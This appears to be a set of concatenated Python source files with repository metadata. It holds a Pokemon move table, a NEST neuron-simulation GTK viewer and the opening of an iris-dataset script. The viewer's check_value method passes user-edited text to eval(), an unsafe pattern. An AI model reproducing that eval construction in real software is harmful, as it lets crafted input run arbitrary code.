power=20,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Razor Leaf": DamagingMove("Razor Leaf",
power=55,
category="Physical",
priority=0,
type="Grass",
accuracy=0.950000),
"Razor Shell": DamagingMove("Razor Shell",
power=75,
category="Physical",
priority=0,
type="Water",
accuracy=0.950000),
"Razor Wind": DamagingMove("Razor Wind",
power=80,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Recover": HealingMove("Recover",
category="Non-Damaging",
type="Normal",
healing_percent=0.5),
"Recycle": Move("Recycle",
category="Non-Damaging",
type="Normal"),
"Reflect": Move("Reflect",
category="Non-Damaging",
type="Psychic"),
"Reflect Type": Move("Reflect Type",
category="Non-Damaging",
type="Normal"),
"Refresh": Move("Refresh",
category="Non-Damaging",
type="Normal"),
"Relic Song": DamagingMove("Relic Song",
power=75,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000,
handler=handle_relic_song),
"Rest": Move("Rest",
category="Non-Damaging",
type="Psychic"),
"Retaliate": DamagingMove("Retaliate",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Return": DamagingMove("Return",
power=102,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Revenge": DamagingMove("Revenge",
power=60,
category="Physical",
priority=-4,
type="Fighting",
accuracy=1.000000),
"Reversal": DamagingMove("Reversal",
power=0,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Roar": Move("Roar",
category="Non-Damaging",
type="Normal"),
"Roar of Time": DamagingMove("Roar of Time",
power=150,
category="Special",
priority=0,
type="Dragon",
accuracy=0.900000),
"Rock Blast": DamagingMove("Rock Blast",
power=25,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Rock Climb": DamagingMove("Rock Climb",
power=90,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Rock Polish": BoostingMove("Rock Polish",
category="Non-Damaging",
type="Rock",
boosts={
'spe': 2
}),
"Rock Slide": DamagingMove("Rock Slide",
power=75,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Rock Smash": DamagingMove("Rock Smash",
power=40,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Rock Throw": DamagingMove("Rock Throw",
power=50,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Rock Tomb": DamagingMove("Rock Tomb",
power=60,
category="Physical",
priority=0,
type="Rock",
accuracy=0.950000),
"Rock Wrecker": DamagingMove("Rock Wrecker",
power=150,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Role Play": Move("Role Play",
category="Non-Damaging",
type="Psychic"),
"Rolling Kick": DamagingMove("Rolling Kick",
power=60,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.850000),
"Rollout": DamagingMove("Rollout",
power=30,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Roost": HealingMove("Roost",
category="Non-Damaging",
type="Flying",
healing_percent=0.5),
"Rototiller": Move("Rototiller",
category="Non-Damaging",
type="Ground"),
"Round": DamagingMove("Round",
power=60,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Sacred Fire": DamagingMove("Sacred Fire",
power=100,
category="Physical",
priority=0,
type="Fire",
accuracy=0.950000),
"Sacred Sword": DamagingMove("Sacred Sword",
power=90,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Safeguard": Move("Safeguard",
category="Non-Damaging",
type="Normal"),
"Sand Attack": Move("Sand Attack",
category="Non-Damaging",
type="Ground"),
"Sand Tomb": DamagingMove("Sand Tomb",
power=35,
category="Physical",
priority=0,
type="Ground",
accuracy=0.850000),
"Sandstorm": Move("Sandstorm",
category="Non-Damaging",
type="Rock"),
"Scald": DamagingMove("Scald",
power=80,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Scary Face": Move("Scary Face",
category="Non-Damaging",
type="Normal"),
"Scratch": DamagingMove("Scratch",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Screech": Move("Screech",
category="Non-Damaging",
type="Normal"),
"Searing Shot": DamagingMove("Searing Shot",
power=100,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Secret Power": DamagingMove("Secret Power",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Secret Sword": DamagingMove("Secret Sword",
power=85,
category="Special",
priority=0,
type="Fighting",
accuracy=1.000000),
"Seed Bomb": DamagingMove("Seed Bomb",
power=80,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Seed Flare": DamagingMove("Seed Flare",
power=120,
category="Special",
priority=0,
type="Grass",
accuracy=0.850000),
"Seismic Toss": DamagingMove("Seismic Toss",
power=0,
category="Physical",
priority=0,
type="Fighting",
handler=handle_seismic_toss,
accuracy=1.000000),
"Self-Destruct": DamagingMove("Self-Destruct",
power=200,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Shadow Ball": DamagingMove("Shadow Ball",
power=80,
category="Special",
priority=0,
type="Ghost",
accuracy=1.000000),
"Shadow Claw": DamagingMove("Shadow Claw",
power=70,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Shadow Force": DamagingMove("Shadow Force",
power=120,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Shadow Punch": DamagingMove("Shadow Punch",
power=60,
category="Physical",
priority=0,
type="Ghost",
accuracy=0.000000),
"Shadow Sneak": DamagingMove("Shadow Sneak",
power=40,
category="Physical",
priority=1,
type="Ghost",
accuracy=1.000000),
"Sharpen": BoostingMove("Sharpen",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 1
}),
"Sheer Cold": DamagingMove("Sheer Cold",
power=0,
category="Special",
priority=0,
type="Ice",
accuracy=0.300000),
"Shell Smash": BoostingMove("Shell Smash",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 2,
'spatk': 2,
'spe': 2,
'pdef': -1,
'spdef': -1
}),
"Shift Gear": BoostingMove("Shift Gear",
category="Non-Damaging",
type="Steel",
boosts={
'patk': 1,
'spe': 2
}),
"Shock Wave": DamagingMove("Shock Wave",
power=60,
category="Special",
priority=0,
type="Electric",
accuracy=0.000000),
"Signal Beam": DamagingMove("Signal Beam",
power=75,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Silver Wind": DamagingMove("Silver Wind",
power=60,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Simple Beam": Move("Simple Beam",
category="Non-Damaging",
type="Normal"),
"Sing": Move("Sing",
category="Non-Damaging",
type="Normal"),
"Sketch": Move("Sketch",
category="Non-Damaging",
type="Normal"),
"Skill Swap": Move("Skill Swap",
category="Non-Damaging",
type="Psychic"),
"Skull Bash": DamagingMove("Skull Bash",
power=130,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Sky Attack": DamagingMove("Sky Attack",
power=140,
category="Physical",
priority=0,
type="Flying",
accuracy=0.900000),
"Sky Drop": DamagingMove("Sky Drop",
power=60,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Sky Uppercut": DamagingMove("Sky Uppercut",
power=85,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.900000),
"Slack Off": HealingMove("Slack Off",
category="Non-Damaging",
type="Normal",
healing_percent=0.5),
"Slam": DamagingMove("Slam",
power=80,
category="Physical",
priority=0,
type="Normal",
accuracy=0.750000),
"Slash": DamagingMove("Slash",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Sleep Powder": Move("Sleep Powder",
category="Non-Damaging",
type="Grass"),
"Sleep Talk": Move("Sleep Talk",
category="Non-Damaging",
type="Normal"),
"Sludge": DamagingMove("Sludge",
power=65,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Sludge Bomb": DamagingMove("Sludge Bomb",
power=90,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Sludge Wave": DamagingMove("Sludge Wave",
power=95,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Smack Down": DamagingMove("Smack Down",
power=50,
category="Physical",
priority=0,
type="Rock",
accuracy=1.000000),
"Smelling Salts": DamagingMove("Smelling Salts",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Smog": DamagingMove("Smog",
power=30,
category="Special",
priority=0,
type="Poison",
accuracy=0.700000),
"Smokescreen": Move("Smokescreen",
category="Non-Damaging",
type="Normal"),
"Snarl": DamagingMove("Snarl",
power=55,
category="Special",
priority=0,
type="Dark",
accuracy=0.950000),
"Snatch": Move("Snatch",
category="Non-Damaging",
type="Dark"),
"Snore": DamagingMove("Snore",
power=50,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Soak": Move("Soak",
category="Non-Damaging",
type="Water"),
"Soft-Boiled": HealingMove("Soft-Boiled",
category="Non-Damaging",
type="Normal",
healing_percent=0.5),
"Solar Beam": DamagingMove("Solar Beam",
power=120,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Sonic Boom": DamagingMove("Sonic Boom",
power=0,
category="Special",
priority=0,
type="Normal",
accuracy=0.900000),
"Spacial Rend": DamagingMove("Spacial Rend",
power=100,
category="Special",
priority=0,
type="Dragon",
accuracy=0.950000),
"Spark": DamagingMove("Spark",
power=65,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Spider Web": Move("Spider Web",
category="Non-Damaging",
type="Bug"),
"Spike Cannon": DamagingMove("Spike Cannon",
power=20,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Spikes": Move("Spikes",
category="Non-Damaging",
type="Ground",
handler=handle_spikes),
"Spiky Shield": Move("Spiky Shield",
category="Non-Damaging",
type="Grass"),
"Spit Up": DamagingMove("Spit Up",
power=0,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Spite": Move("Spite",
category="Non-Damaging",
type="Ghost"),
"Splash": Move("Splash",
category="Non-Damaging",
type="Normal"),
"Spore": Move("Spore",
category="Non-Damaging",
type="Grass"),
"Stealth Rock": Move("Stealth Rock",
category="Non-Damaging",
type="Rock",
handler=handle_stealth_rock),
"Steam Eruption": DamagingMove("Steam Eruption",
power=110,
category="Special",
priority=0,
type="Water",
accuracy=0.950000),
"Steamroller": DamagingMove("Steamroller",
power=65,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Steel Wing": DamagingMove("Steel Wing",
power=70,
category="Physical",
priority=0,
type="Steel",
accuracy=0.900000),
"Sticky Web": Move("Sticky Web",
category="Non-Damaging",
type="Bug"),
"Stockpile": Move("Stockpile",
category="Non-Damaging",
type="Normal"),
"Stomp": DamagingMove("Stomp",
power=65,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Stone Edge": DamagingMove("Stone Edge",
power=100,
category="Physical",
priority=0,
type="Rock",
accuracy=0.800000),
"Stored Power": DamagingMove("Stored Power",
power=0,
power_handler=power_stored_power,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Storm Throw": DamagingMove("Storm Throw",
power=60,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Strength": DamagingMove("Strength",
power=80,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"String Shot": Move("String Shot",
category="Non-Damaging",
type="Bug"),
"Struggle": DamagingMove("Struggle",
power=50,
category="Physical",
priority=0,
type="Normal",
accuracy=0.000000),
"Struggle Bug": DamagingMove("Struggle Bug",
power=50,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Stun Spore": Move("Stun Spore",
category="Non-Damaging",
type="Grass"),
"Submission": DamagingMove("Submission",
power=80,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.800000),
"Substitute": Move("Substitute",
category="Non-Damaging",
type="Normal"),
"Sucker Punch": DamagingMove("Sucker Punch",
power=80,
category="Physical",
priority=1,
type="Dark",
accuracy=1.000000),
"Sunny Day": Move("Sunny Day",
category="Non-Damaging",
type="Fire"),
"Super Fang": DamagingMove("Super Fang",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Superpower": DamagingMove("Superpower",
power=120,
category="Physical",
priority=0,
type="Fighting",
handler=handle_superpower,
accuracy=1.000000),
"Supersonic": Move("Supersonic",
category="Non-Damaging",
type="Normal"),
"Surf": DamagingMove("Surf",
power=90,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Swagger": Move("Swagger",
category="Non-Damaging",
type="Normal"),
"Swallow": Move("Swallow",
category="Non-Damaging",
type="Normal"),
"Sweet Kiss": Move("Sweet Kiss",
category="Non-Damaging",
type="Fairy"),
"Sweet Scent": Move("Sweet Scent",
category="Non-Damaging",
type="Normal"),
"Swift": DamagingMove("Swift",
power=60,
category="Special",
priority=0,
type="Normal",
accuracy=0.000000),
"Switcheroo": Move("Switcheroo",
category="Non-Damaging",
type="Dark"),
"Swords Dance": BoostingMove("Swords Dance",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 2
}),
"Synchronoise": DamagingMove("Synchronoise",
power=120,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Synthesis": HealingMove("Synthesis",
category="Non-Damaging",
type="Grass",
healing_percent=0.5),
"Tackle": DamagingMove("Tackle",
power=50,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Tail Glow": BoostingMove("Tail Glow",
category="Non-Damaging",
type="Bug",
boosts={
'spatk': 3
}),
"Tail Slap": DamagingMove("Tail Slap",
power=25,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Tail Whip": Move("Tail Whip",
category="Non-Damaging",
type="Normal"),
"Tailwind": Move("Tailwind",
category="Non-Damaging",
type="Flying"),
"Take Down": DamagingMove("Take Down",
power=90,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Taunt": Move("Taunt",
category="Non-Damaging",
type="Dark"),
"Techno Blast": DamagingMove("Techno Blast",
power=120,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Teeter Dance": Move("Teeter Dance",
category="Non-Damaging",
type="Normal"),
"Telekinesis": Move("Telekinesis",
category="Non-Damaging",
type="Psychic"),
"Teleport": Move("Teleport",
category="Non-Damaging",
type="Psychic"),
"Thief": DamagingMove("Thief",
power=60,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Thousand Arrows": DamagingMove("Thousand Arrows",
power=90,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Thousand Waves": DamagingMove("Thousand Waves",
power=90,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Thrash": DamagingMove("Thrash",
power=120,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Thunder": DamagingMove("Thunder",
power=110,
category="Special",
priority=0,
type="Electric",
accuracy=0.700000),
"Thunder Fang": DamagingMove("Thunder Fang",
power=65,
category="Physical",
priority=0,
type="Electric",
accuracy=0.950000),
"Thunder Punch": DamagingMove("Thunder Punch",
power=75,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Thunder Shock": DamagingMove("Thunder Shock",
power=40,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Thunder Wave": Move("Thunder Wave",
category="Non-Damaging",
type="Electric",
handler=handle_thunder_wave),
"Thunderbolt": DamagingMove("Thunderbolt",
power=90,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Tickle": Move("Tickle",
category="Non-Damaging",
type="Normal"),
"Topsy-Turvy": Move("Topsy-Turvy",
category="Non-Damaging",
type="Dark"),
"Torment": Move("Torment",
category="Non-Damaging",
type="Dark"),
"Toxic": Move("Toxic",
category="Non-Damaging",
type="Poison"),
"Toxic Spikes": Move("Toxic Spikes",
category="Non-Damaging",
type="Poison"),
"Transform": Move("Transform",
category="Non-Damaging",
type="Normal"),
"Tri Attack": DamagingMove("Tri Attack",
power=80,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Trick": Move("Trick",
category="Non-Damaging",
type="Psychic"),
"Trick Room": Move("Trick Room",
category="Non-Damaging",
type="Psychic"),
"Trick-or-Treat": Move("Trick-or-Treat",
category="Non-Damaging",
type="Ghost"),
"Triple Kick": DamagingMove("Triple Kick",
power=10,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.900000),
"Trump Card": DamagingMove("Trump Card",
power=0,
category="Special",
priority=0,
type="Normal",
accuracy=0.000000),
"Twineedle": DamagingMove("Twineedle",
power=25,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Twister": DamagingMove("Twister",
power=40,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"U-turn": DamagingMove("U-turn",
power=70,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Uproar": DamagingMove("Uproar",
power=90,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"V-create": DamagingMove("V-create",
power=180,
category="Physical",
priority=0,
type="Fire",
accuracy=0.950000,
handler=handle_vcreate),
"Vacuum Wave": DamagingMove("Vacuum Wave",
power=40,
category="Special",
priority=1,
type="Fighting",
accuracy=1.000000),
"Venom Drench": Move("Venom Drench",
category="Non-Damaging",
type="Poison"),
"Venoshock": DamagingMove("Venoshock",
power=65,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Vice Grip": DamagingMove("Vice Grip",
power=55,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Vine Whip": DamagingMove("Vine Whip",
power=45,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Vital Throw": DamagingMove("Vital Throw",
power=70,
category="Physical",
priority=-1,
type="Fighting",
accuracy=0.000000),
"Volt Switch": DamagingMove("Volt Switch",
power=70,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Volt Tackle": DamagingMove("Volt Tackle",
power=120,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Wake-Up Slap": DamagingMove("Wake-Up Slap",
power=70,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Water Gun": DamagingMove("Water Gun",
power=40,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Water Pledge": DamagingMove("Water Pledge",
power=80,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Water Pulse": DamagingMove("Water Pulse",
power=60,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Water Shuriken": DamagingMove("Water Shuriken",
power=15,
category="Physical",
priority=1,
type="Water",
accuracy=1.000000),
"Water Sport": Move("Water Sport",
category="Non-Damaging",
type="Water"),
"Water Spout": DamagingMove("Water Spout",
power=150,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Waterfall": DamagingMove("Waterfall",
power=80,
category="Physical",
priority=0,
type="Water",
accuracy=1.000000),
"Weather Ball": DamagingMove("Weather Ball",
power=50,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Whirlpool": DamagingMove("Whirlpool",
power=35,
category="Special",
priority=0,
type="Water",
accuracy=0.850000),
"Whirlwind": Move("Whirlwind",
category="Non-Damaging",
type="Normal"),
"Wide Guard": Move("Wide Guard",
category="Non-Damaging",
type="Rock"),
"Wild Charge": DamagingMove("Wild Charge",
power=90,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Will-O-Wisp": Move("Will-O-Wisp",
category="Non-Damaging",
type="Fire",
handler=handle_willowisp),
"Wing Attack": DamagingMove("Wing Attack",
power=60,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Wish": Move("Wish",
category="Non-Damaging",
type="Normal"),
"Withdraw": BoostingMove("Withdraw",
category="Non-Damaging",
type="Water",
boosts={
'pdef': 1
}),
"Wonder Room": Move("Wonder Room",
category="Non-Damaging",
type="Psychic"),
"Wood Hammer": DamagingMove("Wood Hammer",
power=120,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Work Up": BoostingMove("Work Up",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 1,
'spatk': 1
}),
"Worry Seed": Move("Worry Seed",
category="Non-Damaging",
type="Grass"),
"Wrap": DamagingMove("Wrap",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Wring Out": DamagingMove("Wring Out",
power=0,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"X-Scissor": DamagingMove("X-Scissor",
power=80,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Yawn": Move("Yawn",
category="Non-Damaging",
type="Normal"),
"Zap Cannon": DamagingMove("Zap Cannon",
power=120,
category="Special",
priority=0,
type="Electric",
accuracy=0.500000),
"Zen Headbutt": DamagingMove("Zen Headbutt",
power=80,
category="Physical",
priority=0,
type="Psychic",
accuracy=0.900000),
}
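# Minimal lookup sketch (illustrative; the dict above is bound to a name
# defined earlier in this file, here assumed to be "moves"):
#   move = moves["Thunderbolt"]
#   print(move.power, move.type, move.accuracy)  # -> 90 Electric 1.0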
|
vasumv/pokemon_ai
|
showdownai/move_list.py
|
Python
|
mit
| 135,020
|
[
"BLAST"
] |
e47ea03d31986b263aab701de68443c59e15b6c9d536a3438f71e1e493026417
|
# -*- coding: utf-8 -*-
#
# neuronview.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
import pygtk
pygtk.require('2.0')
import gtk
import pango
import gobject
from matplotlib.figure import Figure
from matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas
import matplotlib.gridspec as gridspec
import os
import nest
default_neuron = "iaf_neuron"
default_stimulator = "dc_generator"
class Main() :
def __init__(self):
self._gladefile = "neuronview.glade"
self._builder = gtk.Builder()
self._builder.add_from_file(self._gladefile)
self._builder.connect_signals(self)
self._win = self._builder.get_object("mainwindow")
self._win.resize(900, 700)
box = self._builder.get_object("box5")
self._stimulatordictview = DictView()
self._builder.get_object("scrolledwindow2").add(self._stimulatordictview)
box = self._builder.get_object("box4")
self._neurondictview = DictView()
self._builder.get_object("scrolledwindow3").add(self._neurondictview)
self.populate_comboboxes()
self._figure = Figure(figsize=(5,4), dpi=100)
canvas = FigureCanvas(self._figure)
canvas.set_size_request(200, 250)
canvas.show()
box = self._builder.get_object("box3")
bg_style = box.get_style().bg[gtk.STATE_NORMAL]
gtk_color = (bg_style.red_float, bg_style.green_float, bg_style.blue_float)
self._figure.set_facecolor(gtk_color)
box.pack_start(canvas)
self._win.show()
gtk.main()
def update_figure(self, spikes, potentials):
if nest.GetKernelStatus("time") != 0.0:
self._figure.clear()
# num_figures = (len(spikes) != 0) + (len(potentials) != 0)
# fig_num = 1
gs = gridspec.GridSpec(2, 1, height_ratios=[1, 4])
ax0 = self._figure.add_subplot(gs[0])
ax0.plot(spikes[0]["times"], [1]*len(spikes[0]["times"]), ".")
ax0.set_yticks([])
ax0.set_xticks([])
ax1 = self._figure.add_subplot(gs[1])
ax1.plot(potentials[0]["times"], potentials[0]["V_m"], "r-")
ax1.set_ylabel("$V_m$ (mV)")
ax1.set_xlabel("time (s)")
# plt.tight_layout()
self._figure.canvas.draw()
def filter_statusdict(self, params):
for key in ["archiver_length", "available", "capacity",
"elementsize", "frozen", "global_id",
"instantiations", "is_refractory", "local",
"model", "element_type", "offset", "origin",
"receptor_types", "recordables",
"refractory_input", "rmax", "state", "t_spike",
"thread", "tlast", "tspike", "type_id", "vp",
"ymod"]:
if key in params.keys():
params.pop(key)
def populate_comboboxes(self):
neuronmodels = self._builder.get_object("neuronmodels")
neuronmodelsliststore = neuronmodels.get_model()
stimulatormodels = self._builder.get_object("stimulatormodels")
stimulatormodelsliststore = stimulatormodels.get_model()
neuron_it = None
stimulator_it = None
models = nest.Models("nodes")
models = [x for x in models if x not in ["correlation_detector", "sli_neuron",
"iaf_psc_alpha_norec", "parrot_neuron", "parrot_neuron_ps"]]
for entry in models:
try:
entrytype = nest.GetDefaults(entry)["element_type"]
            except Exception:
entrytype = "unknown"
if entrytype == "neuron":
it = neuronmodelsliststore.append([entry])
if entry == default_neuron: neuron_it = it
elif entrytype == "stimulator":
it = stimulatormodelsliststore.append([entry])
if entry == default_stimulator: stimulator_it = it
cell = gtk.CellRendererText()
neuronmodels.pack_start(cell, True)
neuronmodels.add_attribute(cell, 'text', 0)
neuronmodels.set_active_iter(neuron_it)
stimulatormodels.pack_start(cell, True)
stimulatormodels.add_attribute(cell, 'text', 0)
stimulatormodels.set_active_iter(stimulator_it)
docviewcombo = self._builder.get_object("docviewcombo")
docviewcomboliststore = docviewcombo.get_model()
docviewcomboliststore.append(["Stimulating device"])
it = docviewcomboliststore.append(["Neuron"])
docviewcombo.pack_start(cell, True)
docviewcombo.add_attribute(cell, 'text', 0)
docviewcombo.set_active_iter(it)
def get_help_text(self, name):
nest.sli_run("statusdict /prgdocdir get")
docdir = nest.sli_pop()
helptext = "No documentation available"
for subdir in ["cc", "sli"]:
filename = os.path.join(docdir, "help", subdir, name + ".hlp")
if os.path.isfile(filename):
helptext = open(filename, 'r').read()
return helptext
def on_model_selected(self, widget):
liststore = widget.get_model()
model = liststore.get_value(widget.get_active_iter(), 0)
statusdict = nest.GetDefaults(model)
self.filter_statusdict(statusdict)
if widget == self._builder.get_object("neuronmodels"):
self._neurondictview.set_params(statusdict)
if widget == self._builder.get_object("stimulatormodels"):
self._stimulatordictview.set_params(statusdict)
self.on_doc_selected(self._builder.get_object("docviewcombo"))
def on_doc_selected(self, widget):
liststore = widget.get_model()
doc = liststore.get_value(widget.get_active_iter(), 0)
docview = self._builder.get_object("docview")
docbuffer = gtk.TextBuffer()
if doc == "Neuron":
combobox = self._builder.get_object("neuronmodels")
if doc == "Stimulating device":
combobox = self._builder.get_object("stimulatormodels")
liststore = combobox.get_model()
model = liststore.get_value(combobox.get_active_iter(), 0)
docbuffer.set_text(self.get_help_text(model))
docview.set_buffer(docbuffer)
docview.modify_font(pango.FontDescription("monospace 10"))
def on_simulate_clicked(self, widget):
nest.ResetKernel()
combobox = self._builder.get_object("stimulatormodels")
liststore = combobox.get_model()
stimulatormodel = liststore.get_value(combobox.get_active_iter(), 0)
params = self._stimulatordictview.get_params()
stimulator = nest.Create(stimulatormodel, params=params)
combobox = self._builder.get_object("neuronmodels")
liststore = combobox.get_model()
neuronmodel = liststore.get_value(combobox.get_active_iter(), 0)
neuron = nest.Create(neuronmodel, params=self._neurondictview.get_params())
weight = self._builder.get_object("weight").get_value()
delay = self._builder.get_object("delay").get_value()
nest.Connect(stimulator, neuron, weight, delay)
sd = nest.Create("spike_detector", params={"record_to": ["memory"]})
nest.Connect(neuron, sd)
vm = nest.Create("voltmeter", params={"record_to": ["memory"],
"interval": 0.1})
nest.Connect(vm, neuron)
simtime = self._builder.get_object("simtime").get_value()
nest.Simulate(simtime)
self.update_figure(nest.GetStatus(sd, "events"), nest.GetStatus(vm, "events"))
def on_delete_event(self, widget, event):
self.on_quit(widget)
return True
def on_quit(self, project):
self._builder.get_object("mainwindow").hide()
gtk.main_quit()
class DictView(gtk.TreeView) :
def __init__(self, params = None) :
gtk.TreeView.__init__(self)
if params:
self.params = params
self.repopulate()
renderer = gtk.CellRendererText()
column = gtk.TreeViewColumn("Name", renderer, text=1)
self.append_column(column)
renderer = gtk.CellRendererText()
renderer.set_property("mode", gtk.CELL_RENDERER_MODE_EDITABLE)
renderer.set_property("editable", True)
column = gtk.TreeViewColumn("Value", renderer, text=2)
self.append_column(column)
self.set_size_request(200, 150)
renderer.connect("edited", self.check_value)
self.show()
def repopulate(self) :
model = gtk.TreeStore(gobject.TYPE_PYOBJECT, gobject.TYPE_STRING, gobject.TYPE_STRING)
for key in sorted(self.params.keys()) :
pos = model.insert_after(None, None)
data = {"key" : key, "element_type" : type(self.params[key])}
model.set_value(pos, 0, data)
model.set_value(pos, 1, str(key))
model.set_value(pos, 2, str(self.params[key]))
self.set_model(model)
def check_value(self, widget, path, new_text) :
model = self.get_model()
data = model[path][0]
try :
typename = data["element_type"].__name__
new_value = eval("%s('%s')" % (typename, new_text))
if typename == "bool" and new_text.lower() in ["false", "0"] :
new_value = False
self.params[data["key"]] = new_value
model[path][2] = str(new_value)
except ValueError :
old_value = self.params[data["key"]]
model[path][2] = str(old_value)
def get_params(self) :
return self.params
def set_params(self, params) :
self.params = params
self.repopulate()
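# Usage sketch (an assumption, not part of the original example): DictView can
# be embedded in any GTK container to edit a plain parameter dict in place.
#   win = gtk.Window()
#   view = DictView({"V_m": -70.0, "C_m": 250.0})
#   win.add(view)
#   win.show_all()
#   # edited values are written back; view.get_params() returns the dict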
if __name__ == "__main__" :
Main()
|
magnastrazh/NEUCOGAR
|
nest/serotonin/research/C/nest-2.10.0/examples/neuronview/neuronview.py
|
Python
|
gpl-2.0
| 10,544
|
[
"NEURON"
] |
317cbfbd2fa614d5a331e1eff079e10bc75f9f1a2c4c202b17207b9ca6cdc2ab
|
from __future__ import print_function
from builtins import range
"""
SECTION 1 : Load and setup data for training
"""
import csv
import random
import math
random.seed(113)
# Load dataset
with open('../Datasets/iris/iris.csv') as csvfile:
csvreader = csv.reader(csvfile)
next(csvreader, None) # skip header
dataset = list(csvreader)
# Change string value to numeric
for row in dataset:
row[4] = ["Iris-setosa", "Iris-versicolor", "Iris-virginica"].index(row[4])
    row[:4] = [float(row[j]) for j in range(4)]  # convert only the four features to float
# Split x and y (feature and target)
random.shuffle(dataset)
datatrain = dataset[:int(len(dataset) * 0.8)]
datatest = dataset[int(len(dataset) * 0.8):]
train_X = [data[:4] for data in datatrain]
train_y = [data[4] for data in datatrain]
